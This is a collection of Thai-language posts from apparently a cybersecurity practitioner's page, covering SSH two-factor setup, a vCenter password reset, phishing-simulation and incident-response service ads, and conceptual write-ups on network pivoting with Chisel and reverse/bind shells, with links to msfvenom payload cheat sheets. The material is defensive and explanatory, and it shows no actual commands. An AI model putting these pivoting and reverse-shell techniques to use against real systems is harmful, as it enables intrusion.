System & Network & CyberSecurity

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

>> สามารถอ่าน Medium ด้านล่างเพื่อเป็นภาพประกอบได้นะครับ
Medium: https://so-sonajaa.medium.com/ubuntu-enable-2fa-using-google-authenticator-4dcd52609117

Topic: Ubuntu Enable 2FA using Google-Authenticator

สวัสดีครับสำหรับวันนี้ผมได้ทดสอบเกี่ยวกับการ Authentication on Linux ก็คิดว่าจะทำ Server Linux สำหรับการ Authentication อย่างไรให้ปลอดภัยและมีความ Security มากาขึ้นจากเดิมก็ไป Re-search ดูก็มีหลากหลายวิธีเหมือนกันก็คิดว่าจะไป Solution Authentication Using Public/Private Keys ก็หน้าจะ Secure แล้วนะเพราะว่าถ้าจะ Access เข้ามาก็ต้องมี Private Keys ที่เครื่อง Source ก่อนถึงจะ Access/Authentication เข้ามายังเครื่อง Target/Server Linux ได้ อันนี้ก็หน้าจะเป็น Solution ปกติแหละครับ แต่คือนะวันนี้พึ่งรู้ว่า Server Linux สามารถ ทำ 2FA ได้ โดยการ Integrate with Google Authentication ได้ ว่าแต่ผมไปอยู่ที่ไหนมาเนียพึ่งรู้ว่ามันทำได้ 5555!!! พอรู้ว่ามันสามารถทำได้ ไอ้เราด้วยดิชอบลองชอบเล่นชอบเห็นด้วยตาตัวเองก็เลยต้อง Proof of Concept(POC) ซะเลย สำหรับ OS ที่ใช้ POC ก็คือ Ubuntu 22.04.5 LTS หลังจากลอง ๆ POC ดู โอโห้ ๆ มันทำ 2FA ได้ ด้วยเฟี้ยวฟ้าว เหมือนกันนะ แบบว่า มันก็ทำไม่ได้ยากอะไร มันก็แจ่มเหมือนกันนะเนีย สามารถดู How to Configure as below krub.

Proof of Concept(POC) — Ubuntu Enable 2FA using Google-Authenticator
Medium: https://so-sonajaa.medium.com/ubuntu-enable-2fa-using-google-authenticator-4dcd52609117

Reference:
Course Udemy: Secure Shell essentials: a hands-on guide

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

สวัสดีครับวันนี้จะมาขอ Share เกี่ยวกับการทำความเข้าใจเกี่ยวกับ Command-Linux ฮะ เนื่องจากกำลังศึกษาเกี่ยวกับการใช่คำสั่ง Linux แต่บางทีการที่เราเรียน ๆ Course และแค่ Copy - Paste Command มาใส่ แต่จริง ๆ ไม่รู้ความหมายของมัน จริง ๆ แบบว่า Copy Paste และ Ex*****on ได้ก็พอแว้ววว ละ 555!! และไปเจอ Website หนึ่งดีเหมือนกันครับ
สามารถอธิบาย Command-line ได้ โดยสามารถใช่คู่กับ GTP ก็จะทำให้เข้าใจมากขึ้นครับ แบบว่าเจอ Command line อันไหนไม่เข้าใจก็
- Copy Paste to GTP
- Copy Paste to Explainshell
รอนั่งอ่าน ชิว ๆ ๆ ฮะ --- และหลังจากนั้น เราก็จะ เอา Command-line อันนั้นมา Adapt เอาครับ!!

Ref:
https://explainshell.com/

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

ขอแนะนำบริการใหม่ของเรา!!!

Email Phishing Simulation:
บริการจำลองสถานการณ์ Phishing เพื่อช่วยองค์กรของคุณให้พร้อมรับมือ! เราจะสร้างแคมเปญอีเมลที่สมจริงส่งให้พนักงานภายใน เพื่อให้พวกเขาได้ฝึกทักษะการรับรู้และตอบสนองต่อภัยคุกคามฟิชชิง เนื้อหาในอีเมลถูกออกแบบให้ดูน่าเชื่อถือ ทำให้พนักงานสามารถฝึกสังเกตและระวังภัยฟิชชิงได้โดยทางทีมงานของเราจะมีการจำลอง Campaigns ที่มีลักษณะเหมือนจริง เช่น

Header Fiels:
- From, Subject:
- Email Body:
- Hyperlinks:
- Impersonating Domain:
- Phishing Credential Harvester

Methodology:
1. Planning
2. Campaign Design and Development
3. Ex*****on and Deployment
4. Monitoring and Data Collection
5. Analysis and Report

Benefit & Delivery:
1. Delivery Document & Report
2. Presentation

Project Goals:
ช่วยเพิ่มความตื่นตัวและทักษะการตรวจจับ Email Phishing ของพนักงาน ลดความเสี่ยงของการโจมตีผ่านช่องทางอีเมลที่อาจนำไปสู่การรั่วไหลของข้อมูลสำคัญ

Our Certification:
CCD | eCDFP | eCTHPv2 | BTL1 | CRTP | eJPT | CySA+ | Sec+ | HCIA

Remark: เป็นเพียงรายละเอียดเบื่องต้น หากสนใจข้อมูลเพิ่มเติมหรือมีคำถามใด ๆ สามารถติดต่อทีมงานได้ในช่องทาง ได้เลยครับ ซึ่งทางทีมงานของเราสามารถดำเนินการ POC เบื่องต้นให้ได้ครับ ขอบคุณครับ

Password [vCenter] [email protected]
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

>> สามารถอ่าน Medium ด้านล่างเพื่อเป็นภาพประกอบได้นะครับ
Medium: https://so-sonajaa.medium.com/reset-password-vcenter-administrator-vsphere-local-9c89c1b42d23

สวัสดีครับทุก ๆท่าน!! เช้านี้ตื่นมากระว่าจะ Proof of concept Solution ซะหน่อย ก็เลยมาเปิด Server VMware ที่บ้านเพื่อทำการ Testing Solution แต่ปัญหาคืองานเข้าจำ Password Login vCenter ไม่ได้ เอาไงละที่นี้เพราะทำ Cluster, VM Template Folder, VM Template ไว้เยอะซะด้วยดิ ถ้าจะลงใหม่ก็เสียดายขี้เกียจทำใหม่แต่ลงใหม่ก็หน้าจะไม่ได้เพราะลงง่าย ไม่หน้าติดปัญหาอะไร แต่จริง ๆก็ขี้เกียจจัด VM Template Folder ใหม่ 5555!! คิดอะไรไม่ออกต้องไปถามเพื่อน GPT เพราะอุส่าให้ค่าขนม GPT เดือนละ 20 USD ต้องขอความช่วยเหลือเยอะ ๆ และ เพื่อน Google

Ref: เพื่อนแท้ GPT ที่อยู่ด้วยกันตลอดเมื่อเราเจอปัญหา 5555
Ref: https://www.youtube.com/watch?v=JsddIzgQ8iA

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

ขออนุญาตประกาศนะครับ---หากองกรณ์ของคุณถูกโจมตีทาง Cyber สามารถปรึกษาทาง Page ของเราได้ครับ ทางเรายินดีให้คำปรึกษา ครับ!!!

ขออนุญาตแนะนำบริการใหม่ของทางเรานะครับ!!!

DFIR (Cybersecurity Only)
เมื่อองค์กรของคุณถูกโจมตีทาง Cyber ไม่ว่าจะเป็นการโจมตีด้วย Ransomware, Web Attack, หรือการโจมตีที่ทำให้ระบบไม่สามารถใช้งานได้และการกู้คืน (Recovery) ระบบเพื่อให้กลับมาใช้งานได้เป็นสิ่งสำคัญ เนื่องจากธุรกิจต้องการความพร้อมในการดำเนินงาน (Availability) เพื่อให้ระบบสามารถทำงานได้ตลอดเวลา อย่างไรก็ตาม การดำเนินการดังกล่าวอาจมีข้อสงสัยและความเสี่ยง เช่น:

1. ในองกรณ์ยังมี Malware หรือ Attacker หลงเหลืออยู่ในระบบหรือไม่?

2. ความเสี่ยงต่อการถูกโจมตีซ้ำ (Re-infection) ยังคงมีอยู่หรือไม่?
ดังนั้น ก่อนที่จะทำการ Recovery เราต้องมั่นใจก่อนว่า Backup Point ที่ใช้เป็น Clean Zone จริง ๆ และต้องรู้ถึงสาเหตุของปัญหาเพื่อปิดช่องโหว่ที่อาจนำไปสู่การโจมตีซ้ำภายในอนาคต

หมายเหตุ: หากคุณสงสัยว่ายังมี Malware หลงเหลืออยู่ในระบบ หรือต้องการป้องกันความเสี่ยงจากการโจมตีซ้ำ รวมถึงยับยั้งความเสียหายไม่ให้ขยายวงกว้าง และต้องการทราบถึง Root Cause ที่แท้จริงเพื่อนำไปแก้ไขปัญหาอย่างตรงจุด

Methodology: DFIR (Cybersecurity)
1. Incident Response(IR): Framework Incident Response (NIST SP 800-61 Rev2) (Computer Security Incident hadling Guide)
** Preparation:
** Detection and Analysis:
** Containment / Eradication / Recovery:
** Post-Incident Activity:

2. Digital Forensics(DF): Framework: Forensic Techniques into Incidents Response (NIST 800-86)
** Collection:
** Identifying Possible Source of Data
** Acquiring the Data
** Examination:
** Analysis:
** Reporting
Remark: (Windows Host-Based & Network Forensics)

Benefit & Delivery
1. Incident Response Report (รายงานการตอบสนองเหตุการณ์)
** สรุปเหตุการณ์ - Incident Summary: อธิบายเหตุการณ์ที่เกิดขึ้น เช่น ลักษณะการโจมตี (เช่น Ransomware, Phishing, การบุกรุกเครือข่าย) และเวลาที่เริ่มต้นตรวจพบ

** การวิเคราะห์เหตุการณ์ – (Incident Analysis): อธิบายถึงการวิเคราะห์ที่ดำเนินการ เช่น วิธีการโจมตีและช่องโหว่ที่ผู้โจมตีใช้ รวมถึงข้อมูลเชิงลึกจากการตรวจสอบระบบ

** Key Findings “Root cause Analysis”(สิ่งที่ค้นพบจากเหตุการณ์): สรุปสิ่งที่ค้นพบจากเหตุการณ์ เช่น จุดอ่อนของระบบ หรือความบกพร่องในการตอบสนองที่ต้องปรับปรุง

2. Digital Evidence Report (หลักฐานดิจิทัล)
** รายงานการวิเคราะห์หลักฐาน (Forensic Analysis Report): รายงานการวิเคราะห์จากการตรวจสอบไฟล์ ข้อมูลในระบบ หรือหน่วยความจำ ซึ่งบ่งชี้ถึงพฤติกรรมของผู้โจมตี เช่น การรันโปรแกรมที่ผิดปกติหรือการแก้ไขไฟล์

3. Future Prevention Plan Report (แผนการป้องกันในอนาคต)
** Recommendation for Improvement (คำแนะนำในการป้องกัน): ให้คำแนะนำเกี่ยวกับวิธีการป้องกันเหตุการณ์ที่คล้ายคลึงกันในอนาคต เช่น การอัปเดตระบบปฏิบัติการ การเพิ่มความเข้มงวดในการตรวจสอบสิทธิ์ (Authentication) และการตรวจสอบระบบเป็นประจำ

** Incident Response (IR Plan Update)
Incident Response(Update IRP or Create IRP): หลังจากเหตุการณ์เสร็จสิ้นแล้ว อาจมีการปรับปรุงแผน IR ของลูกค้าให้ครอบคลุมมากขึ้น เช่น เพิ่มขั้นตอนการตรวจจับภัยคุกคามเร็วขึ้น หรือปรับปรุงการสื่อสารภายในองค์กรในกรณีที่เกิดเหตุการณ์ซ้ำ

Optional Service:
** Compromise Assessment:
** Threat Hunting:

Conclusion:
การนำบริการ DFIR (Digital Forensics and Incident Response) มาใช้ในการตอบสนองและวิเคราะห์การโจมตีทางไซเบอร์ จะช่วยให้องค์กรสามารถป้องกันและรับมือกับภัยคุกคามได้อย่างมีประสิทธิภาพ ลดความเสี่ยงจากการสูญเสียข้อมูลและการหยุดชะงักของธุรกิจ พร้อมทั้งสร้างความมั่นใจว่าระบบขององค์กรจะปลอดภัยทั้งในปัจจุบันและอนาคต หนึ่งในข้อดีของการใช้ DFIR คือการสามารถระบุสาเหตุที่แท้จริงของการโจมตี (Root Cause) ทำให้องค์กรสามารถแก้ไขปัญหาได้อย่างตรงจุดและป้องกันไม่ให้เกิดเหตุซ้ำ นอกจากนี้ ยังช่วยให้องค์กรเรียนรู้จากเหตุการณ์ (Lesson Learned) และนำไปปรับปรุงระบบให้มีความปลอดภัยมากยิ่งขึ้น

Remark: หากต้องการข้อมูลเพิ่มเติมเกี่ยวกับบริการ DFIR ของเรา หรือต้องการคำปรึกษาเกี่ยวกับการเพิ่มความปลอดภัยให้กับระบบของคุณ สามารถติดต่อทีมงานได้ผ่านช่องทาง Inbox เข้ามาหา Admin ได้ใน Page สามารถพูดคุยและพร้อมให้คำปรึกษาได้ครับ เพราะทางเรานั้นมีประสบการณ์จริงเกี่ยวกับการ Investigate & Analysis ในส่วนของการโจมตีทาง Cyber หลากหลาย Case ครับ!!! ขอบคุณครับ

My Certification:
** CCD | OSDA | eCDFP | eCTHPv2 | BTL1 | CHFI | CRTP | eJPT | CySA+ | Sec+ | HCIA | Pentest+ | CASP+ | CEH |

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

>> สามารถอ่าน Medium ด้านล่างเพื่อเป็นภาพประกอบได้นะครับ
Medium: https://so-sonajaa.medium.com/pivot-network-with-chisel-poc-b61a9def154f

สวัสดีครับพี่น้อง นักสืบ Cyber นักสืบโคนนัน ทุกท่าน ๆ ครับ วันนี้ว่าง ๆ เลยจะมาขอ Share ในเรื่องของ Pivot Network ครับ เพราะความสงสัย ในเรื่องของการโจมตี ครับ อาจจะมีส่วนเกี่ยวข้องกับ Case ที่เจอครับ จากการ Investigate & Analysis การโจมตี และมีความส่งสัยว่า แอ๊ะ ๆ ทำไม่ เครื่อง Server ที่ถูก Compromises นั้น มันมี พฤติกรรมแปลก ๆ ครับ เมื่อส่งสัยก็ต้องทดสอบฮะ!!!

สำหรับ Pivot Network จะเป็น Techniques หนึ่ง ที่พวก Attacker ใช่ในการโจมตีในระบบ Network แบบว่า Attacker สามารถ Compromises Server ได้เครื่องหนึ่งแล้ว และจะใช้ เครื่องนี้แหละ เป็นฐานปฏิบัติการ เพื่อที่จะ Lateral Movement ไปยัง Network Zone อื่น ที่นี้แหละ คือ Detection ยากแหละครับ เพราะว่า มันคือ Internal to Internal เพราะฉะนั้นแล้ว มันก็ Detection ยากอะแหละครับ !!! และส่วนมาก Policy Firewall ก็อาจจะทำไม่ Security อาจจะเปิดเป็น All-All, Any-Any ครับ และถ้าองกรณ์ไม่มี SOC ค่อย Monitoring & Detection อยู่ก็อาจจะไม่รู้เลยก็ได้นะครับ ว่ามี Attacker มาฝั่งอยู่นานแสนนานแล้วครับ อย่างที่บอกว่าทำไม่ถึงบอกว่า Internal to Internal มันก็ Detection ยากอะครับ เพราะ Attacker อาจจะใช่ Techniques เพิ่มเติมเช่น (Port Forwarding, Proxy Pivoting Proxychain, VPN Pivoting etc) ครับ ยิ่งทำแบบนี้ก็ ยิ่ง Detection ยากเลยครับ เพราะว่า จะมองว่า เป็น Behavior ปกติ ที่ Internal คุยกับ Internal ครับ แน๊ะ ๆ เริ่มส่งสัย.. ไอ้ Attacker มันทำอย่างไร นะแบบนี้ 5555!! ว่าแต่มีความสงสัย!! เราก็ต้องไป Proof of concept สิครับ เพื่อให้ความสงสัยนั้น ไม่สงสัย เพราะเห็นด้วยตาของเราแล้วครับ
สำหรับการ Proof of Concept Pivot Network with Chisel
Ref: https://github.com/jpillora/chisel

Conclusion:
การทำ Pivot Network คือ เทคนิคในการใช้เครื่องที่ถูก Compromises ได้แล้วเป็นจุดเชื่อมต่อเพื่อ Lateral Movement ไปยังเครื่องอื่น ๆ ภายใน Network >> Attacker สามารถ Compromises เครื่อง Victim ได้แล้ว จะใช้เครื่องนี้เป็นทางผ่าน (Pivot) เพื่อ Lateral Movement ไปโจมตี Victim เครื่องอื่น ที่อยู่ Internal Network ลักษณะแบบว่า มีการทำ Tunneling เพื่อสามารถ ใช้คำสั่ง ๆต่าง ๆ บน เครื่อง Attacker และ มี Traffic สามารถ วิ่งไปที่เครื่อง Victim แล้วก็ วิ่ง ไปที่เครื่องปลายทางอีกที!!! จริง ๆถ้าเจอแบบนี้ก็ Dtection ยากครับ เพราะ เราจะเห็น Traffic แบบว่า Internal to Internal เพราะ Attacker อาจจะใช่ Techniques เพิ่มเติมเช่น (Port Forwarding, Proxy Pivoting Proxychain, VPN Pivoting etc) ครับ ยิ่งทำแบบนี้ก็ ยิ่ง Detection ยากเลยครับ เพราะว่า จะมองว่า เป็น Behavior ปกติ ที่ Internal คุยกับ Internal ครับ

Ref: https://github.com/jpillora/chisel

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

Pivot Network with Chisel — [POC] …

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ
>>สามารถอ่าน Medium ด้านล่างเพื่อเป็นภาพประกอบได้นะครับ
Medium: https://so-sonajaa.medium.com/review-course-microsoft-365-admin-microsoft-defender-by-zabbix-in-thailand-d15e8c859d57

Review: Course Microsoft 365 Admin + Microsoft Defender by “Zabbix In Thailand”

Instructor:
Mr. Thanyapon Sananakin (Microsoft MVP)

Admin Zabbix In Thailand:
Mr. Abdulloh Etaeluengoh

Community: https://www.facebook.com/groups/1772801392937535
ชอบ ๆ Background Group page: ครับ “การให้ ไม่มีวันสิ้นสุด”

สวัสดีครับพี่น้อง Cybersecurity ทุกท่าน ๆ ครับ วันนี้ จะมาเสริม Knowledge เกี่ยวกับ Microsoft365 + Microsoft Defender ครับ เห็นอ่าน แว๊ปๆ ว่า Exchange มันกำลังจะ EOS อยู่.. ก็เลยคิดว่าจะมาเสริมพลัง เสริม Skill ด้าน Email ฮะ และแล้วก็เวลาก็พอเหมาะ พอดีเลยครับ 555 เพราะว่าทาง Group “Zabbix In Thailand” นั้นมีการจัด Course: Microsoft 365 Admin + Microsoft Defender by “Zabbix In Thailand” ซึ่งเป็นกลุ่ม Community about share knowledge ต่าง ๆ และไม่เก็บค่า Course แต่อย่างใด แต่จะเก็บเฉพาะค่าอาหาร และ ค่าของว่าง ซึ่งเอาง่าย ๆเลยครับ แบบว่ามาเรียน และกินอิ่ม ขนม นม น้ำเปล่า และก็ข้าว จริง ๆ คืออิ่มมากครับ และก็ได้ Knowledge ไปเต็ม ๆ เลยครับ แต่ยิ่งไปกว่านั้นคือได้ Connection เพิ่มเติมด้วยครับ…ว่าแต่ไปดูเกี่ยวกับ Agenda กันฮะ

Agenda:
แค่เห็น Agenda ก็แจ่มแล้วครับเพราะผมเองก็ไม่เคยเล่น MS.365 เลยครับ ว่าแต่ Day1 — Basic MS 365 Configurations อันนี้ จากที่ได้เรียนคิดว่า หน้าจะเป็น Course Implementation ได้เลยนะครับ Instructor เจาะลึก แบบว่าทำตามและหน้าจะ Implement Email ได้เลยครับ!!

แต่มาเจอ Security ด้วยแบบนี้ก็ยิ่งเข้าทางเลยครับ
1. Security Adoption Framework: อันนี้เห็นภาพเลยครับ เป็น ขั้นเป็นตอนแบบว่าตามลำดับเลยครับ (CEO, CIO-CISO, Architects & Technical Managers, Implementation)
2. Defend Across Attack Chains: อันนี้ก็เห็นภาพ เกี่ยวกับ Attach Chains เลยครับ ทั้งในมุมมองของ External Threats & Insider ซึ่งทาง Microsoft Cybersecurity Reference Architectures ก็ อธิบายเนื้อหาก็ครอบคลุมเลยครับ
3. Email Authentication
สำหรับอันนี้คือดี เลยครับในมุมมองของ การ Configure ในส่วนของ Senderให้มีความ Security มากครับ
* Configure SPF:
* Configure DKIM:
* Configure DMARC

Conclusion:
จากการเรียนทั้งสองวันนี้ คือเป็น Course ที่อัดแน่นด้วย Knowledge เต็ม ๆ ในส่วนของ Microsoft 365 Admin + Microsoft Defender ซึ่งทางผู้สอน สอนแบบเจาะลึก การ Configuration และพา walkthrough menu เลยครับ คือจริง ๆ แล้วคือ สามารถนำ Concept ที่เรียนจาก Course นี้ไป Implement & Troubleshooting ภายในองกรณ์ของเราได้เลยแหละครับ!!! สำหรับ Course นี้ต้องขอขอบคุณ ทาง Group “Zabbix in Thailand” & Instructor: “MR.Thanyapon Sananakin (Microsoft MVP)” ที่มีโครงการดี ๆ แบบนี้ ที่เป็นการ Share Knowledge จริง ๆ แบบว่า “การให้ ไม่มีวันสิ้นสุด” Knowledge + Connection!!!!

สำหรับ Course Training ครั้งต่อไปสามารถติดตามข่าวสารผ่าน Page “Zabbix In Thailand” https://www.facebook.com/groups/1772801392937535 ได้ครับ เพื่อจะไม่พลาดข่าวสารเกียวกับ Course Training ในครั้งต่อไป ครับ

Ref Zabbix in Thailand: https://www.facebook.com/groups/1772801392937535
Ref mvpskill: https://www.facebook.com/groups/528854527167791
Ref: https://learn.microsoft.com/th-th/security/adoption/mcra
Ref: https://learn.microsoft.com/en-us/security/adoption/adoption

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
#มือใหม่กำลังหัดเขียนมีอะไรแนะนำได้เลยนะครับ

#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับจัดทำขึ้นมาเพื่อShareครับโดยไม่มีจุดประสงค์อื่นครับ

>>สามารถอ่าน Medium ด้านล่างเพื่อเป็นภาพประกอบได้นะครับ
Medium: https://so-sonajaa.medium.com/reverse-shell-bind-shell-testing-83cffe349c94

บางทีก็สงสัยเหมือนกันนะครับสำหรับการเข้าไปทำ Case ที่ถูกโจมตี และโดนฝั่ง Backdoor & C2 & Web Shell พวกนี้ คือ Hacker มันเจาะเข้ามาและมันเข้าไปวาง File และก็ Persistence บน Server ได้อย่างไร นิ โดยขอยกตัวอย่างในส่วนของ Windows or Linux ประมาณหนึ่งที่อาจจะพบเจออยู่บ่อย ๆ นะครับ เช่น
Startup:
Scheduled Tasks:
Windows Service:
Registry:
Web Shell:
DLL:
Crontab:
Script:
Startup Script — Systemd:
คือ Path พวกนี้ เราอาจจะพบบ่อย หรือจะเป็น สิ่งที่เราต้องตรวจสอบเลย ว่า Case ที่เราไปทำนั้น มันมี Backdoor & C2 ฝั่งอยู่หรือป่าว เอาเป็นว่าลักษณะ Backdoor & C2 ที่เจอ ก็จะประมาณนี้ และมันก็สงสัยว่าทำไม่ Hacker มันถึงเข้ามาวาง File Backdoor ได้ละ ? Hacker มัน เทพ ๆ จัด ๆ เลย สามารถ Bypass EDR, Bypass Security Control, Evasion โอโห้ Hacker มันทำท่า พวกนี้เลยรึ และกว่า Hacker มันจะเข้ามาได้ หน้าจะต้องใช้เวลา หน้าดูเลย และ Hacker ที่เข้ามาก็ต้องเป็นระดับ APT โหด ๆ แน่เลย!! ความคิดมาเลย… แต่คือพอเข้าไปตรวจสอบ File ต่าง ๆ เช่นแค่ง่าย ๆ เลย HASH ไป Check Virustotal, หรือ โยนใส่ Any.run อ่าว ๆ มันก็เจอ เป็น Malware นี้หว่า… แอ๊ะ ๆ ทำไม่ถึง เครื่องที่ถูกว่าง มันไม่ Detection ละ… และ Port ที่มันใช่งาน มันก็ไม่ใช่ Port Well Know นี้หว่า และทำไม่มันถึง Run ได้ล๊ะ ทั้ง ๆ ที่ Hacker มันก็ไม่ได้ใช่ Techniques/Tactics ที่โหด ๆ เลยนี้หว่า มันก็แค่ File Backdoor ธรรมดา นี้หว่า!!! 555 สรุปเลยก็คือ เครื่อง Victim ไม่มี Antivirus และก็ทำ Policy Network [All,All, Any Any] จริง ๆแล้ว แค่ มีการติดตั้ง Antivirus[EPP or EDR] มันก็สามารถ Detection ได้ล๊ะ และถ้า ทำ Policy Firewall [Network Zone, Restric SourceIP, DestinationIP, Service, Port] แค่นี้ มันก็เพิ่มความปลอดภัย หรือ เพิ่ม Security ได้พอสมควรแล้วนะครับ แต่ปัญหาคือส่วนมากสำหรับปัญหาพวกนี้ มักจะเกิด กับหน่วยงาน หรือบริษัท ทีมีความละเลย เรื่องเล็ก ๆ พวกนี้แหละครับ 5555!!! นึกว่าจะได้ของดี ซะอีก 555 — — ได้ File ธรรมดา แต่ที่เข้ามาได้ มันก็คือ มันไม่มี Security Control อะไรเลยนี้หว่า 555!! คือจริง ๆแค่ มีการ Configure ให้มีความรัดกุมมากขึ้น มันก็ช่วยได้เยอะเลยนะครับ — — ไป Testing กันเลยดีกว่าครับ !!!!

Conclusion:
Reverse Shell: เครื่องเป้าหมายเชื่อมต่อออกไปยังเครื่องผู้โจมตี
Bind Shell: เครื่องเป้าหมายเปิดพอร์ตให้ผู้โจมตีเชื่อมต่อเข้ามา

How to Protection:
1. Configure Network Firewall: Configure Firewall Policy เพื่อจำกัดการเชื่อมต่อขาเข้าและขาออก โดยกำหนดเฉพาะ Source IP, Destination IP, Service, และ Port ที่จำเป็นเท่านั้น พร้อมออกแบบ Network Zone ให้ปลอดภัย

2. Network Segmentation: แบ่ง Network Zone ด้วย VLAN และ Access Control Lists (ACLs) เพื่อจำกัดการเข้าถึงระหว่าง Network Zone

3. Least Privilege: กำหนดสิทธิ์การเข้าถึงเฉพาะที่จำเป็น ลดสิทธิ์ของผู้ใช้ให้ต่ำที่สุดเท่าที่จำเป็น เพื่อป้องกันการโจมตีที่พยายาม “Privilege Escalation” สมมุติถึงจะเข้ามาได้แล้ว…แต่ได้ สิทธิ์ แค่ “Domain User” or “www-data” เข้ามาก็ทำอะไรไม่ได้ — — สุดท้ายแล้วก็ต้อง หาวิธี Privilege Escalation or Lateral Movement ไปหาเครื่องที่ดีกว่า 5555!! และในระหว่างนี้ละ ยังไงมันก็ต้องใช่เวลา แหละ !!!

4. Install EDR: ติดตั้ง EDR และต้องมีการ Monitoring and Update Signature Version Up-to-date — — คือ ถ้ามีการ Update Version Up-to-date แล้ว และมีการ Configure Temper Protection ของ Policy Agent EDR ไม่ให้ใครมา Stop Service or Uninstall Agent ได้ ก็จะเพิ่มความปลอดภัยเช่นกัน…. และถ้า Hacker สามารถเข้ามาและ Bypass EDR ได้ ทั้ง ๆ ที่เรา Configure Strong Policy แล้ว นั้นแสดงว่า Hacker เก่งจริง 555 — แต่ถ้าในกรณีนี้ คือ ถ้าเรามีการ Monitoring อยู่ ยังไงก็หน้าจะเห็น Signal มั่งแหละ เพราะว่า เข้ามาแล้ว ยังไง ก็ต้องมีการ Download Tools เข้ามา เพื่อ ดำเนินการตามขั้นตอน แต่ถ้า มันไม่มี Alert เลย แสดงว่า เราเจอ Hacker ของจริง แว้ว ฮะ 5555!!

5. Update & Upgrade OS: อัปเดตระบบปฏิบัติการและซอฟต์แวร์ทั้งหมดให้เป็นเวอร์ชันล่าสุดเพื่อลดความเสี่ยงจากช่องโหว่ !!! แต่มันจะมีความเสี่ยง ที่ระบบ มันจะเข้า ไม่ได้ 5555!!!!

6. System Hardening: Scan CIS Benchmark เพื่อเพิ่ม Security ในระดับพื้นฐาน — แต่เพิ่มงานให้ IT — — แก้ไข ตาม CIS เมื่อยมือ!!! และแก้ไป ระบบจะพัง ไหม!!!

**จริง ๆ ทำแค่นี้มันก็สามารถเพิ่มความปลอดภัยให้กับระบบเราได้พอสมควรนะครับ และ อาจจะไม่ต้อง เปลือง Budget มากนะ ครับ เน้นของที่มีอยู่แล้ว แค่ทำให้มันมีประสิทธิภาพ ก็เท่านั้น ฮะ

Reference:
https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom
https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea1
https://www.youtube.com/watch?v=IGjwWpgDNek

#หวังว่าเนื้อหานี้จะเป็นประโยชน์กับทุกคนครับแล้วเจอกันใหม่ในบทความต่อไปครับ!
#แบ่งปัน
#เป็นเพียงแนวคิดหรือความคิดของผู้เขียนผิดพลาดประการใดต้องขออภัยด้วยครับ
#การเรียนรู้ไม่มีที่สิ้นสุด_เล่นไปเรื่อยๆ_ยิ่งเล่นยิ่งสนุก
#ผู้เขียนจัดทำเพื่อแชร์ความรู้และประสบการณ์นะครับผิดพลาดประการใดต้องขออภัยด้วยครับ
